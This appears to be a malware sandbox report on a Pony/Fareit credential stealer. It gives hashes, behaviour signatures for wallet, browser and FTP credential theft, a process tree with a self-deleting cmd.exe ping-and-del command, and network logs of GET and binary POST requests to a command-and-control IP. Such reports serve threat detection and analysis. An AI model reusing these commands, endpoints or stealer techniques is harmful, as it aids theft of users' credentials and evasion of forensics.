Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

fb30601d90...5b.exe

windows7_x64

10

fb30601d90...5b.exe

windows10_x64

10

Analysis

  • max time kernel
    69s
  • max time network
    73s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    07/07/2020, 12:10 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe

  • Size

    1.1MB

  • MD5

    32b2c85efdbb016ad3c04fd3e4ff4cee

  • SHA1

    828f0f32aca9eb4d144029919b0dac48ae34de1c

  • SHA256

    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b

  • SHA512

    502e9c133d03cc01aa98a348eb46cea69fdd7e2b66ab759d54cc625779a052e89924a805bcf5a3a3954808b460f5297e2e9efb9f84fc675d57dd72ca62edb83b

Score
10/10
spywarediscoveryratstealerpony

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Accesses cryptocurrency wallets, possible credential harvesting 2 TTPs
    spyware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Checks for installed software on the system 1 TTPs 7 IoCs
    discovery
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

    ratspywarestealerpony
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spyware

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    "C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
      C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe dfsr
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Checks for installed software on the system
      PID:3864
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c ping 127.0.0.1 & del /F /Q "C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3600
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:3372

Network

  • flag-unknown
    DNS
    blockchain.info
    Remote address:
    8.8.8.8:53
    Request
    blockchain.info
    IN A
    Response
    blockchain.info
    IN A
    104.16.55.3
    blockchain.info
    IN A
    104.16.54.3
  • flag-unknown
    GET
    https://blockchain.info/rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    Remote address:
    104.16.55.3:443
    Request
    GET /rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ HTTP/1.1
    If-None-Match: f64e026e
    User-Agent: WinHttp.WinHttpRequest.5.1
    Host: blockchain.info
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Tue, 07 Jul 2020 12:10:47 GMT
    Content-Type: application/json;charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: __cfduid=d4962dd4b56b0b49afac89e23f544cd5a1594123847; expires=Thu, 06-Aug-20 12:10:47 GMT; path=/; domain=.blockchain.info; HttpOnly; SameSite=Lax
    content-language: en
    content-security-policy: img-src 'self' data: https://blockchain.info *.blockchain.info https://s0.2mdn.net https://cdn4.buysellads.net https://pagead2.googlesyndication.com https://pagead2.googlesyndication.com.br https://pagead2.googlesyndication.cn https://pagead2.googlesyndication.de https://pagead2.googlesyndication.co.id https://pagead2.googlesyndication.co.in https://pagead2.googlesyndication.com.ng https://pagead2.googlesyndication.nl https://pagead2.googlesyndication.ru https://pagead2.googlesyndication.co.uk https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk https://www.google-analytics.com https://www.google-analytics.com.br https://www.google-analytics.cn https://www.google-analytics.de https://www.google-analytics.co.id https://www.google-analytics.co.in https://www.google-analytics.com.ng https://www.google-analytics.nl https://www.google-analytics.ru https://www.google-analytics.co.uk https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk https://www.google.com https://www.google.com.br https://www.google.cn https://www.google.de https://www.google.co.id https://www.google.co.in https://www.google.com.ng https://www.google.nl https://www.google.ru https://www.google.co.uk https://stats.g.doubleclick.net https://securepubads.g.doubleclick.net; style-src 'self' 'unsafe-inline'; frame-src 'self' https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk ; child-src 'self' https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk ; script-src 'self' 'sha256-nnpbmI6DKHRe+knaMsPTXncz9jvCdT0AsKfHsAnPjpY=' 'sha256-gl5QXlsJYl7qV85/u6oyEmNFrjPNkcBWeqS/KjYflKY=' https://srv.buysellads.com https://c.amazon-adsystem.com https://www.google-analytics.com https://www.google-analytics.com.br https://www.google-analytics.cn https://www.google-analytics.de https://www.google-analytics.co.id https://www.google-analytics.co.in https://www.google-analytics.com.ng https://www.google-analytics.nl https://www.google-analytics.ru https://www.google-analytics.co.uk https://www.googletagservices.com https://www.googletagservices.com.br https://www.googletagservices.cn https://www.googletagservices.de https://www.googletagservices.co.id https://www.googletagservices.co.in https://www.googletagservices.com.ng https://www.googletagservices.nl https://www.googletagservices.ru https://www.googletagservices.co.uk https://adservice.google.com https://adservice.google.com.br https://adservice.google.cn https://adservice.google.de https://adservice.google.co.id https://adservice.google.co.in https://adservice.google.com.ng https://adservice.google.nl https://adservice.google.ru https://adservice.google.co.uk https://pagead2.googlesyndication.com https://pagead2.googlesyndication.com.br https://pagead2.googlesyndication.cn https://pagead2.googlesyndication.de https://pagead2.googlesyndication.co.id https://pagead2.googlesyndication.co.in https://pagead2.googlesyndication.com.ng https://pagead2.googlesyndication.nl https://pagead2.googlesyndication.ru https://pagead2.googlesyndication.co.uk https://securepubads.g.doubleclick.net https://cdn.ampproject.org; connect-src 'self' *.blockchain.info wss://*.blockchain.info https://blockchain.info wss://ws.blockchain.info https://www.google-analytics.com https://www.google-analytics.com.br https://www.google-analytics.cn https://www.google-analytics.de https://www.google-analytics.co.id https://www.google-analytics.co.in https://www.google-analytics.com.ng https://www.google-analytics.nl https://www.google-analytics.ru https://www.google-analytics.co.uk https://stats.g.doubleclick.net https://securepubads.g.doubleclick.net; object-src 'none'; media-src 'none'; font-src 'self'; worker-src 'none';
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    vary: Accept-Encoding
    x-blockchain-application: explorer-bitcoin-core
    x-blockchain-cp-b: explorer-bitcoin-core
    x-blockchain-ms: true
    x-blockchainn-cp-b: 0d18b5191775
    x-frame-options: SAMEORIGIN
    x-cache-status: MISS 6205b60c039fd2b64c7a6883c4bacb9b
    x-blockchain-language: en
    x-blockchain-language-id: 0:0:0 (en:en:en)
    x-request-id: b826b9af9f9ed0ceb6c82b6fbe61430b
    x-original-host: blockchain.info
    x-blockchain-server: BlockchainFE/1.0
    x-blockchain-cp-f: zt1g 0.113 - b826b9af9f9ed0ceb6c82b6fbe61430b
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    Via: 1.1 google
    CF-Cache-Status: DYNAMIC
    cf-request-id: 03cac89eb00000bf37adabd200000001
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Server: cloudflare
    CF-RAY: 5af176ddebf1bf37-AMS
  • flag-unknown
    GET
    http://45.61.136.126/viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    Remote address:
    45.61.136.126:80
    Request
    GET /viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242 HTTP/1.1
    If-None-Match: f64e026e
    User-Agent: WinHttp.WinHttpRequest.5.1
    Host: 45.61.136.126
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 07 Jul 2020 12:11:01 GMT
    Content-Type: application/octet-stream
    Transfer-Encoding: chunked
    Connection: keep-alive
    Last-Modified: Fri, 01 Jan 1990 00:00:00 GMT
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-control: must-revalidate, no-store, no-cache, max-age=0, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Transfer-Encoding: binary
  • flag-unknown
    POST
    http://45.61.136.126/p/z05857687.php
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    Remote address:
    45.61.136.126:80
    Request
    POST /p/z05857687.php HTTP/1.0
    Host: 45.61.136.126
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Accept-Language: en-US
    Content-Length: 169
    Content-Type: application/octet-stream
    Connection: close
    Content-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 07 Jul 2020 12:11:03 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
  • 104.16.55.3:443
    https://blockchain.info/rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ
    tls, http
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    5.1kB
     134.6kB
     100
    98

    HTTP Request

    GET https://blockchain.info/rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ

    HTTP Response

    200
  • 45.61.136.126:80
    http://45.61.136.126/viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242
    http
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    3.7kB
     103.0kB
     77
    75

    HTTP Request

    GET http://45.61.136.126/viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242

    HTTP Response

    200
  • 45.61.136.126:80
    http://45.61.136.126/p/z05857687.php
    http
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    835 B
     403 B
     6
    6

    HTTP Request

    POST http://45.61.136.126/p/z05857687.php

    HTTP Response

    200
  • 127.0.0.1:47001
  • 10.10.0.255:138
    netbios-dgm
    2.2kB
     10
  • 8.8.8.8:53
    blockchain.info
    dns
    61 B
     93 B
     1
    1

    DNS Request

    blockchain.info

    DNS Response

    104.16.55.3
    104.16.54.3

  • 10.10.0.255:137
    netbios-ns
    798 B
     10
  • 10.10.0.34:137
    netbios-ns
    90 B
     1
  • 239.255.255.250:1900
    1.3kB
     8
  • 239.255.255.250:1900
  • 10.10.0.38:137
    netbios-ns
    270 B
     3
  • 10.10.0.22:137
    netbios-ns
    270 B
     3
  • 10.10.0.41:137
    netbios-ns
    270 B
     3

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3864-1-0x0000000002FF0000-0x000000000300C000-memory.dmp

    Filesize

    112KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.